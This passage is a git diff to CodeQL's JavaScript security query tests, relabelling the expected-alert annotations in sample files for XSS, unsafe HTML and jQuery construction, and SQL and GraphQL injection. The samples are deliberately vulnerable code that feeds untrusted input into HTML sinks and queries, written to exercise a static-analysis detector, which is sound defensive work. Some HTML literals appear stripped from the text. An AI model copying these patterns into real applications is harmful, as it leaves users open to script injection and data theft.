res.send(p); // NOT OK - res.send(r); // NOT OK + res.send(p); // $ Alert + res.send(r); // $ Alert }); const aKnownValue = "foo"; @@ -14,13 +14,13 @@ app.get('/bar', function(req, res) { let { p } = req.params; if (p == aKnownValue) - res.send(p); // OK - res.send(p); // NOT OK + res.send(p); + res.send(p); // $ Alert if (p != aKnownValue) - res.send(p); // NOT OK + res.send(p); // $ Alert else - res.send(p); // OK + res.send(p); }); @@ -33,8 +33,8 @@ app.get('/baz', function(req, res) { obj.p = p; var other = clone(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const serializeJavaScript = require('serialize-javascript'); @@ -44,11 +44,11 @@ app.get('/baz', function(req, res) { var serialized = serializeJavaScript(p); - res.send(serialized); // OK + res.send(serialized); var unsafe = serializeJavaScript(p, {unsafe: true}); - res.send(unsafe); // NOT OK + res.send(unsafe); // $ Alert }); const fclone = require('fclone'); @@ -60,8 +60,8 @@ app.get('/baz', function(req, res) { obj.p = p; var other = fclone(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const jc = require('json-cycle'); @@ -72,8 +72,8 @@ app.get('/baz', function(req, res) { obj.p = p; var other = jc.retrocycle(jc.decycle(obj)); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const sortKeys = require('sort-keys'); @@ -85,6 +85,6 @@ app.get('/baz', function(req, res) { obj.p = p; var other = sortKeys(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js index c7d0fd91a4a0..61d153498e74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js @@ -3,11 +3,11 @@ var express = require('express'); var app = express(); app.enable('x-powered-by').disable('x-powered-by').get('/', function (req, res) { let { p } = req.params; - res.send(p); // NOT OK + res.send(p); // $ Alert }); const prettier = require("prettier"); app.post("foobar", function (reg, res) { const code = prettier.format(reg.body, { semi: false, parser: "babel" }); - res.send(code); // NOT OK + res.send(code); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js index c04e0d784efc..be96d05a400a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js @@ -5,7 +5,7 @@ var express = require('express'); express().get('/', function(req, res) { fs.readdir("/myDir", function (error, files1) { - res.send(files1); // NOT OK + res.send(files1); // $ Alert }); }); @@ -23,18 +23,18 @@ http.createServer(function (req, res) { } fs.readdir("/myDir", function (error, files1) { - res.write(files1); // NOT OK + res.write(files1); // $ Alert var dirs = []; var files2 = []; files1.forEach(function (file) { files2.push(file); }); - res.write(files2); // NOT OK + res.write(files2); // $ Alert var files3 = format(files2); - res.write(files3); // NOT OK + res.write(files3); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js index dcf530e3ef5c..4f712f2604e7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js @@ -4,5 +4,5 @@ const parseTorrent = require('parse-torrent'), express().get('/user/:id', function(req, res) { let torrent = parseTorrent(unknown), name = torrent.name; - res.send(name); // NOT OK + res.send(name); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js index 6a133a747bdd..fb229199e687 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js @@ -5,11 +5,11 @@ factory(jQuery); } }(function ($) { - $("" + $.trim("foo") + ""); // OK + $("" + $.trim("foo") + ""); })); $.fn.myPlugin = function (stuff, options) { - $("#foo").html("" + options.foo + ""); // NOT OK + $("#foo").html("" + options.foo + ""); // $ Alert - $("#foo").html("" + stuff + ""); // NOT OK + $("#foo").html("" + stuff + ""); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts index 91e81238605a..9c48ed8c23f5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts @@ -1,4 +1,4 @@ export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK + const html = "" + s + ""; // $ Alert document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts index 4e5e4730547e..3ec0e2007396 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts @@ -1,10 +1,10 @@ export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK - this file is recognized as a main file. + const html = "" + s + ""; // $ Alert - this file is recognized as a main file. document.querySelector("#html").innerHTML = html; } export function objectStuff(settings: any, i: number) { - document.querySelector("#html").innerHTML = "" + settings + ""; // NOT OK + document.querySelector("#html").innerHTML = "" + settings + ""; // $ Alert var name; if (settings.mySetting && settings.mySetting.length !== 0) { @@ -15,7 +15,7 @@ export function objectStuff(settings: any, i: number) { name = ""; } - document.querySelector("#html").innerHTML = "" + name + ""; // NOT OK + document.querySelector("#html").innerHTML = "" + name + ""; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts index e28325ce0cf8..9566ce8468a8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts @@ -1,4 +1,4 @@ export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK - this file is not recognized as a main file. + const html = "" + s + ""; // $ Alert - this file is not recognized as a main file. document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 01d376a2f8be..369643121368 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js @@ -1,15 +1,15 @@ module.exports.xssThroughHTMLConstruction = function (s) { - const html = "" + s + "";// NOT OK + const html = "" + s + "";// $ Alert document.querySelector("#html").innerHTML = html; } module.exports.xssThroughXMLParsing = function (s) { - const doc = new DOMParser().parseFromString(s, "text/xml"); // NOT OK + const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert document.querySelector("#xml").appendChild(doc.documentElement); } module.exports.xssThroughMoreComplexXMLParsing = function (s) { - const doc = new DOMParser().parseFromString(s, "text/xml"); // NOT OK + const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert const xml = doc.documentElement; const tmp = document.createElement('span'); @@ -19,13 +19,13 @@ module.exports.xssThroughMoreComplexXMLParsing = function (s) { const markdown = require('markdown-it')({html: true}); module.exports.xssThroughMarkdown = function (s) { - const html = markdown.render(s); // NOT OK + const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } const striptags = require('striptags'); module.exports.sanitizedHTML = function (s) { - const html = striptags("" + s + ""); // OK + const html = striptags("" + s + ""); document.querySelector("#sanitized").innerHTML = html; } @@ -44,7 +44,7 @@ class Foo { doXss() { // not called here, but still bad. - document.querySelector("#class").innerHTML = "" + this.step + ""; // NOT OK + document.querySelector("#class").innerHTML = "" + this.step + ""; // $ Alert } } @@ -59,35 +59,35 @@ $.fn.xssPlugin = function (options) { }; const settings = $.extend(defaults, options); return this.each(function () { - $("" + settings.name + "").appendTo(this); // NOT OK + $("" + settings.name + "").appendTo(this); // $ Alert }); } module.exports.guards = function (attrVal) { - document.querySelector("#id").innerHTML = "\"""; // NOT OK - document.querySelector("#id").innerHTML = "\"""; // OK + document.querySelector("#id").innerHTML = "\"""; // $ Alert + document.querySelector("#id").innerHTML = "\"""; if (attrVal.indexOf("\"") === -1 && attrVal.indexOf("'") === -1) { - document.querySelector("#id").innerHTML = "\"""; // OK + document.querySelector("#id").innerHTML = "\"""; } } module.exports.intentionalTemplate = function (obj) { - const html = "" + obj.spanTemplate + ""; // OK + const html = "" + obj.spanTemplate + ""; document.querySelector("#template").innerHTML = html; } module.exports.types = function (val) { if (typeof val === "string") { - $("#foo").html("" + val + ""); // NOT OK + $("#foo").html("" + val + ""); // $ Alert } else if (typeof val === "number") { - $("#foo").html("" + val + ""); // OK + $("#foo").html("" + val + ""); } else if (typeof val === "boolean") { - $("#foo").html("" + val + ""); // OK + $("#foo").html("" + val + ""); } } function createHTML(x) { - return "" + x + ""; // NOT OK + return "" + x + ""; // $ Alert } module.exports.usesCreateHTML = function (x) { @@ -96,24 +96,24 @@ module.exports.usesCreateHTML = function (x) { const myMermaid = require('mermaid'); module.exports.usesCreateHTML = function (x) { - myMermaid.render("id", x, function (svg) { // NOT OK + myMermaid.render("id", x, function (svg) { // $ Alert $("#foo").html(svg); }); - $("#foo").html(myMermaid.render("id", x)); // NOT OK + $("#foo").html(myMermaid.render("id", x)); // $ Alert - mermaid.render("id", x, function (svg) {// NOT OK + mermaid.render("id", x, function (svg) {// $ Alert $("#foo").html(svg); }); - $("#foo").html(mermaid.render("id", x)); // NOT OK + $("#foo").html(mermaid.render("id", x)); // $ Alert - mermaid.mermaidAPI.render("id", x, function (svg) {// NOT OK + mermaid.mermaidAPI.render("id", x, function (svg) {// $ Alert $("#foo").html(svg); }); } module.exports.xssThroughMarkdown = function (s) { - const html = markdown.render(s); // NOT OK + const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts index 0f04e92cdc04..a00719d74408 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts @@ -1,11 +1,11 @@ export function basicHtmlConstruction(s: string) { - const html = "" + s + ""; // NOT OK + const html = "" + s + ""; // $ Alert document.body.innerHTML = html; } export function insertIntoCreatedDocument(s: string) { const newDoc = document.implementation.createHTMLDocument(""); - newDoc.body.innerHTML = "" + s + ""; // OK - inserted into document disconnected from the main DOM. [INCONSISTENCY] + newDoc.body.innerHTML = "" + s + ""; // $ SPURIOUS: Alert - inserted into document disconnected from the main DOM. } export function id(s: string) { @@ -14,7 +14,7 @@ export function id(s: string) { export function notVulnerable() { const s = id("x"); - const html = "" + s + ""; // OK + const html = "" + s + ""; document.body.innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js index bda981fe2b7d..896c4f8af210 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js @@ -1,63 +1,63 @@ (function(){ $.fn.my_plugin = function my_plugin(options) { - $(options); // NOT OK (or is it?) + $(options); // $ Alert - or is it? - $(options.target); // NOT OK + $(options.target); // $ Alert if (isElement(options.target)) { - $(options.target); // OK + $(options.target); } var target = options.target; if (isElement(target)) { - $(target); // OK + $(target); } if (typeof target != "string") { - $(target); // OK + $(target); } if (target.jquery === undefined) { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (target.jquery !== undefined) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (typeof target.jquery !== "undefined") { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (typeof target.jquery === "undefined") { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (target.jquery) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (!target.jquery) { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (!!target.jquery) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } }; @@ -65,20 +65,20 @@ $.fn.my_plugin = function my_plugin(element, options) { this.$element = $(element); this.options = $.extend({}, options); - if (this.options.parent) this.$parent = $(this.options.parent) // NOT OK + if (this.options.parent) this.$parent = $(this.options.parent) // $ Alert }; $.fn.my_plugin = function my_plugin(options) { - $(options.foo.bar.baz); // NOT OK - $(options.html); // OK + $(options.foo.bar.baz); // $ Alert + $(options.html); }; $.fn.my_plugin = function my_plugin(options) { - $(x).appendTo(options.foo.bar.baz); // NOT OK + $(x).appendTo(options.foo.bar.baz); // $ Alert }; $.fn.my_plugin = function my_plugin(options) { - $("#" + options.target); // OK + $("#" + options.target); }; $.fn.my_plugin = function my_plugin(options) { @@ -87,7 +87,7 @@ var t = this.o.target; console.log(t); - $(t); // NOT OK + $(t); // $ Alert } f(options); }; @@ -95,7 +95,7 @@ $.fn.my_plugin = function my_plugin(options) { var target = options.target; if (safe.has(target)) - $(target); // OK + $(target); }; $.fn.my_plugin = function my_plugin(options) { @@ -103,8 +103,8 @@ menu: '
', target: '.my_plugin' }, options); - $(options.menu); // OK - $(options.target); // NOT OK + $(options.menu); + $(options.target); // $ Alert }; $.fn.my_plugin.defaults = { @@ -113,38 +113,38 @@ }; $.fn.my_plugin = function my_plugin(options) { options = $.extend({}, $.fn.my_plugin.defaults, options); - $(options.menu); // OK - $(options.target); // NOT OK + $(options.menu); + $(options.target); // $ Alert }; var pluginName = "my_plugin"; $.fn[pluginName] = function my_plugin(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert }; $.extend($.fn, { my_plugin: function my_plugin(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert } }); $.fn.affix = function my_plugin(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert }; $.fn.tooltip = function my_plugin(options) { - $(options.viewport.selector); // NOT OK + $(options.viewport.selector); // $ Alert }; $.fn.my_plugin = function my_plugin(options) { let intentional1 = options.target || `
hello
`; - $(intentional1); // OK + $(intentional1); let intentional2 = `
${options.target}
`; - $(intentional2); // OK + $(intentional2); let intentional3 = `
` + options.target `
`; - $(intentional3); // OK + $(intentional3); let unintentional = `
`; $(unintentional); // OK - but should be flagged by another query @@ -152,22 +152,22 @@ $.fn.my_plugin = function my_plugin(options) { let target = options.target; - target === DEFAULTS.target? $(target): $(document).find(target); // OK - options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); // OK - options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // OK - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties [INCONSISTENCY] + target === DEFAULTS.target? $(target): $(document).find(target); + options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); + options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // $ SPURIOUS: Alert - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties } $.fn.my_plugin = function my_plugin(options) { - $(anyPrefix + options.target); // OK (unlikely to be a html/css prefix confusion) + $(anyPrefix + options.target); // OK - unlikely to be a html/css prefix confusion - $(something.replace("%PLACEHOLDER%", options.target)); // OK (unlikely to be a html/css prefix confusion); + $(something.replace("%PLACEHOLDER%", options.target)); // OK - (unlikely to be a html/css prefix confusion); let target = options.target; if (target.foo) { - $(target); // OK (unlikely to be a string) + $(target); // OK - unlikely to be a string } if (target.length) { - $(target); // NOT OK (can still be a string) + $(target); // $ Alert - can still be a string } } @@ -176,10 +176,10 @@ $.fn.my_plugin = o.f } setupPlugin({f: function(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert }}); setupPlugin({f:function(options) { - $(document).find(options.target); // OK + $(document).find(options.target); }}); $.fn.position = function( options ) { @@ -189,14 +189,14 @@ // extending options options = $.extend( {}, options ); - var target = $( options.of ); // NOT OK + var target = $( options.of ); // $ Alert console.log(target); }; $.fn.blockReceiver = function( options ) { $.extend({ foo() { - $(this); // OK + $(this); } }, options, diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts index 15207cb5059c..e9ca1f400890 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts @@ -13,24 +13,24 @@ export class Foo { safeField: string = ""; setInput1(event) { - document.write(event.target.value); // NOT OK + document.write(event.target.value); // $ Alert } setInput2(target) { - document.write(target.value); // NOT OK + document.write(target.value); // $ Alert } setOtherInput(e) { - document.write(e.target.value); // OK - document.write(e.value); // OK + document.write(e.target.value); + document.write(e.value); } blah(form: NgForm) { - document.write(form.value.foo); // NOT OK + document.write(form.value.foo); // $ Alert } useField() { - document.write(this.field); // NOT OK - document.write(this.safeField); // OK + document.write(this.field); // $ Alert + document.write(this.safeField); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js index b91b7490bb2d..c78fc9284a15 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js @@ -6,10 +6,10 @@ const FormikBasic = () => ( { - $("#id").html(values.foo); // NOT OK + $("#id").html(values.foo); // $ Alert }} onSubmit={(values, { setSubmitting }) => { - $("#id").html(values.bar); // NOT OK + $("#id").html(values.bar); // $ Alert }} > {(inputs) => ( @@ -22,19 +22,19 @@ const FormikBasic = () => ( const FormikEnhanced = withFormik({ mapPropsToValues: () => ({ name: '' }), validate: values => { - $("#id").html(values.email); // NOT OK + $("#id").html(values.email); // $ Alert }, handleSubmit: (values, { setSubmitting }) => { - $("#id").html(values.email); // NOT OK + $("#id").html(values.email); // $ Alert } })(MyForm); (function () { const { values, submitForm } = useFormikContext(); - $("#id").html(values.email); // NOT OK + $("#id").html(values.email); // $ Alert - $("#id").html(submitForm.email); // OK + $("#id").html(submitForm.email); }) import { Form } from 'react-final-form' @@ -42,7 +42,7 @@ import { Form } from 'react-final-form' const App = () => (
{ - $("#id").html(values.stooge); // NOT OK + $("#id").html(values.stooge); // $ Alert }} initialValues={{ stooge: 'larry', employed: false }} render={({ handleSubmit, form, submitting, pristine, values }) => ( @@ -54,7 +54,7 @@ const App = () => ( ); function plainSubmit(e) { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert } const plainReact = () => ( @@ -69,7 +69,7 @@ import { useForm } from 'react-hook-form'; function HookForm() { const { register, handleSubmit, errors } = useForm(); // initialize the hook const onSubmit = (data) => { - $("#id").html(data.name); // NOT OK + $("#id").html(data.name); // $ Alert }; return ( @@ -90,7 +90,7 @@ function HookForm2() { type="button" onClick={() => { const values = getValues(); // { test: "test-input", test1: "test1-input" } - $("#id").html(values.name); // NOT OK + $("#id").html(values.name); // $ Alert }} > @@ -100,10 +100,10 @@ function HookForm2() { function vanillaJS() { document.querySelector("form.myform").addEventListener("submit", e => { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert }); document.querySelector("form.myform").onsubmit = function (e) { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js index 354194a597d9..69812f74e847 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js @@ -1,35 +1,35 @@ (function () { - $("#id").html($("textarea").val()); // NOT OK. + $("#id").html($("textarea").val()); // $ Alert - $("#id").html($(".some-element").text()); // NOT OK. + $("#id").html($(".some-element").text()); // $ Alert - $("#id").html($(".some-element").attr("foo", "bar")); // OK. - $("#id").html($(".some-element").attr({"foo": "bar"})); // OK. - $("#id").html($(".some-element").attr("data-target")); // NOT OK. + $("#id").html($(".some-element").attr("foo", "bar")); + $("#id").html($(".some-element").attr({"foo": "bar"})); + $("#id").html($(".some-element").attr("data-target")); // $ Alert $("#id").html( - document.getElementById("foo").innerText // NOT OK. + document.getElementById("foo").innerText // $ Alert ); $("#id").html( - document.getElementById("foo").innerHTML // OK - only repeats existing XSS. + document.getElementById("foo").innerHTML // OK - only repeats existing XSS. ); $("#id").html( - document.getElementById("foo").textContent // NOT OK. + document.getElementById("foo").textContent // $ Alert ); $("#id").html( - document.querySelectorAll("textarea")[0].value // NOT OK. + document.querySelectorAll("textarea")[0].value // $ Alert ); $("#id").html( - document.getElementById('div1').getAttribute('data-target') // NOT OK + document.getElementById('div1').getAttribute('data-target') // $ Alert ); function safe1(x) { // overloaded function. if (x.jquery) { - var foo = $(x); // OK + var foo = $(x); } } @@ -37,7 +37,7 @@ function safe2(x) { // overloaded function. if (typeof x === "object") { - var foo = $(x); // OK + var foo = $(x); } } safe2($("textarea").val()); @@ -48,52 +48,52 @@ ); - $("#id").get(0).innerHTML = $("textarea").val(); // NOT OK. + $("#id").get(0).innerHTML = $("textarea").val(); // $ Alert var base = $("#id"); - base[html ? 'html' : 'text']($("textarea").val()); // NOT OK. + base[html ? 'html' : 'text']($("textarea").val()); // $ Alert - $("#id").get(0).innerHTML = $("input").get(0).name; // NOT OK. - $("#id").get(0).innerHTML = $("input").get(0).getAttribute("name"); // NOT OK. + $("#id").get(0).innerHTML = $("input").get(0).name; // $ Alert + $("#id").get(0).innerHTML = $("input").get(0).getAttribute("name"); // $ Alert - $("#id").get(0).innerHTML = $("input").getAttribute("id"); // OK. + $("#id").get(0).innerHTML = $("input").getAttribute("id"); - $("#id").get(0).innerHTML = $(document).find("option").attr("value"); // NOT OK. + $("#id").get(0).innerHTML = $(document).find("option").attr("value"); // $ Alert var valMethod = $("textarea").val; - $("#id").get(0).innerHTML = valMethod(); // NOT OK + $("#id").get(0).innerHTML = valMethod(); // $ Alert var myValue = $(document).find("option").attr("value"); if(myValue.property) { - $("#id").get(0).innerHTML = myValue; // OK. + $("#id").get(0).innerHTML = myValue; } - $.jGrowl($("input").get(0).name); // NOT OK. + $.jGrowl($("input").get(0).name); // $ Alert let selector = $("input").get(0).name; if (something()) { selector = $("textarea").val || '' } - $(selector); // NOT OK + $(selector); // $ Alert - $(document.my_form.my_input.value); // NOT OK + $(document.my_form.my_input.value); // $ Alert - $("#id").html( $('#foo').prop('innerText') ); // NOT OK + $("#id").html( $('#foo').prop('innerText') ); // $ Alert const anser = require("anser"); const text = $("text").text(); - $("#id").html(anser.ansiToHtml(text)); // NOT OK - $("#id").html(new anser().process(text)); // NOT OK + $("#id").html(anser.ansiToHtml(text)); // $ Alert + $("#id").html(new anser().process(text)); // $ Alert $("section h1").each(function(){ - $("nav ul").append("Section"); // OK + $("nav ul").append("Section"); }); - $("#id").html($("#foo").find(".bla")[0].value); // NOT OK. + $("#id").html($("#foo").find(".bla")[0].value); // $ Alert for (var i = 0; i < foo.length; i++) { - $("#id").html($("#foo").find(".bla")[i].value); // NOT OK. + $("#id").html($("#foo").find(".bla")[i].value); // $ Alert } })(); @@ -106,20 +106,20 @@ class Super { class Sub extends Super { constructor() { super(); - $("#id").get(0).innerHTML = "foo"; // NOT OK. Attack: `` + $("#id").get(0).innerHTML = "foo"; // $ Alert - Attack: `` } } (function () { const src = document.getElementById("#link").src; - $("#id").html(src); // NOT OK. + $("#id").html(src); // $ Alert - $("#id").attr("src", src); // OK + $("#id").attr("src", src); $("input.foo")[0].onchange = function (ev) { - $("#id").html(ev.target.files[0].name); // NOT OK. + $("#id").html(ev.target.files[0].name); // $ Alert - $("img#id").attr("src", URL.createObjectURL(ev.target.files[0])); // NOT OK + $("img#id").attr("src", URL.createObjectURL(ev.target.files[0])); // $ Alert } })(); @@ -128,31 +128,31 @@ class Sub extends Super { const wSelection = getSelection(); const dSelection = document.getSelection(); let linkText = wSelection.toString() || dSelection.toString() || ''; - elem.innerHTML = linkText; // NOT OK - $("#id").html(linkText); // NOT OK - elem.innerText = linkText; // OK + elem.innerHTML = linkText; // $ Alert + $("#id").html(linkText); // $ Alert + elem.innerText = linkText; })(); const cashDom = require("cash-dom"); (function () { const src = document.getElementById("#link").src; - cash("#id").html(src); // NOT OK. - cashDom("#id").html(src); // NOT OK + cash("#id").html(src); // $ Alert + cashDom("#id").html(src); // $ Alert var DOMPurify = { sanitize: function (src) { return src; // to model spuriously finding an edge. The below is still OK. } }; - cashDom("#id").html(DOMPurify ? DOMPurify.sanitize(src) : src); // OK + cashDom("#id").html(DOMPurify ? DOMPurify.sanitize(src) : src); - $("", { html: src }).appendTo("#id"); // NOT OK + $("", { html: src }).appendTo("#id"); // $ Alert function foo() { window.VeryUniqueXssTestName = { send: function (msg) { - $("#id").html(msg); // NOT OK + $("#id").html(msg); // $ Alert }, }; diff --git a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js index 42b11b27b6eb..c80586686af9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js @@ -4,6 +4,6 @@ const pool = mysql.createPool(getConfig()); let temp = process.env['foo']; pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert }, function(error, results, fields) {}); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts b/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts index 5741f61fad64..3db62486e260 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts +++ b/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts @@ -11,7 +11,7 @@ app.use(bodyParser.json()); app.post("/find", (req, res) => { let v = JSON.parse(req.body.x); - getCollection().find({ id: v }); // NOT OK + getCollection().find({ id: v }); // $ Alert }); import * as mongoose from "mongoose"; @@ -19,6 +19,6 @@ declare function getMongooseModel(): mongoose.Model; declare function getMongooseQuery(): mongoose.Query; app.post("/find", (req, res) => { let v = JSON.parse(req.body.x); - getMongooseModel().find({ id: v }); // NOT OK - getMongooseQuery().find({ id: v }); // NOT OK + getMongooseModel().find({ id: v }); // $ Alert + getMongooseQuery().find({ id: v }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js index 723348daf574..df6be3893b2d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js @@ -6,8 +6,7 @@ const kit = new Octokit(); app.get('/post/:id', function(req, res) { const id = req.params.id; - // NOT OK - const response = kit.graphql(` + const response = kit.graphql(` // $ Alert query { repository(owner: "github", name: "${id}") { object(expression: "master:foo") { @@ -24,13 +23,13 @@ import { graphql, withCustomRequest } from "@octokit/graphql"; app.get('/user/:id/', function(req, res) { const id = req.params.id; - const response = graphql(`foo ${id}`); // NOT OK + const response = graphql(`foo ${id}`); // $ Alert const myGraphql = withCustomRequest(request); - const response = myGraphql(`foo ${id}`); // NOT OK + const response = myGraphql(`foo ${id}`); // $ Alert const withDefaults = graphql.defaults({}); - withDefaults(`foo ${id}`); // NOT OK + withDefaults(`foo ${id}`); // $ Alert }); const { request } = require("@octokit/request"); @@ -41,11 +40,11 @@ app.get('/article/:id/', async function(req, res) { headers: { authorization: "token 0000000000000000000000000000000000000001", }, - query: `foo ${id}`, // NOT OK + query: `foo ${id}`, // $ Alert }); const withDefaults = request.defaults({}); - withDefaults("POST /graphql", { query: `foo ${id}` }); // NOT OK + withDefaults("POST /graphql", { query: `foo ${id}` }); // $ Alert }); import { Octokit as Core } from "@octokit/rest"; @@ -53,9 +52,9 @@ const kit2 = new Core(); 